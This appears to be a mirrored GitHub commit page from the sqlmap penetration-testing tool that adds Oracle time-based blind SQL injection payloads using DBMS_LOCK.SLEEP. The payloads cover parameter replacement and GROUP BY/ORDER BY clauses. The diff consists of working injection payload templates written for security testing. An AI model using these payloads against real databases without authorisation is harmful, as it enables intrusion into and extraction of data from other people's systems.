mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-11-04 01:47:37 +03:00
added new Oracle time-based payloads
This commit is contained in:
Bernardo Damele
parent
2d3a74a0fe
commit
9b0662d1a9
|
|
@ -3325,7 +3325,26 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle time-based blind - Parameter replace</title>
|
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>0</risk>
|
||||||
|
<clause>1,3</clause>
|
||||||
|
<where>3</where>
|
||||||
|
<vector>(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[SLEEPTIME]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Oracle</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
@ -3605,7 +3624,26 @@ Formats:
|
||||||
</test>
|
</test>
|
||||||
|
|
||||||
<test>
|
<test>
|
||||||
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
|
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title>
|
||||||
|
<stype>5</stype>
|
||||||
|
<level>3</level>
|
||||||
|
<risk>0</risk>
|
||||||
|
<clause>2,3</clause>
|
||||||
|
<where>1</where>
|
||||||
|
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END)</vector>
|
||||||
|
<request>
|
||||||
|
<payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE 1/(SELECT 0 FROM DUAL); END IF; END)</payload>
|
||||||
|
</request>
|
||||||
|
<response>
|
||||||
|
<time>[SLEEPTIME]</time>
|
||||||
|
</response>
|
||||||
|
<details>
|
||||||
|
<dbms>Oracle</dbms>
|
||||||
|
</details>
|
||||||
|
</test>
|
||||||
|
|
||||||
|
<test>
|
||||||
|
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title>
|
||||||
<stype>5</stype>
|
<stype>5</stype>
|
||||||
<level>3</level>
|
<level>3</level>
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user